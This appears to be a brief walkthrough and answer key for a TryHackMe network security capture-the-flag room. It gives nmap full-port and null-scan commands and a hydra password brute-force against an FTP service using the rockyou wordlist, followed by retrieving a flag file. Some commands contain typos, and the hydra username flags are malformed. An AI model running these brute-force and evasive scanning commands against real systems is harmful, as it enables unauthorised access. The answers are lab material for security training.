https://tryhackme.com/room/netsecchallenge
Task 2:
Question 1 - 6:
nmap all ports with -p- and wait for it to finish
this will give you every answer you need for 1 - 6:
nmap -sC -sV -p- victim_machine_IP
Question 7:
run this command and replace "ftp_port" with the ftp port you found earlier
hydra -l eddie -l quinn -P /usr/share/wordlists/rockyou.txt ftp://victime_machine_IP:ftp_port
Question 8:
run this command and do the same replacing
ftp victim_machine_ip ftp_port
type in the user and the password you found
get ftp_flag.txt
exit ftp
cat ftp_flag.txt

Question 9:
This simply requires a stealthier scan which you obviously did not do in the beginning. So navigate to the webpage in the browser and reset the packet count.
read more on this here:
https://nmap.org/book/scan-methods-null-fin-xmas-scan.html
Then run this nmap null scan:
namp -sN victim_machine_IP

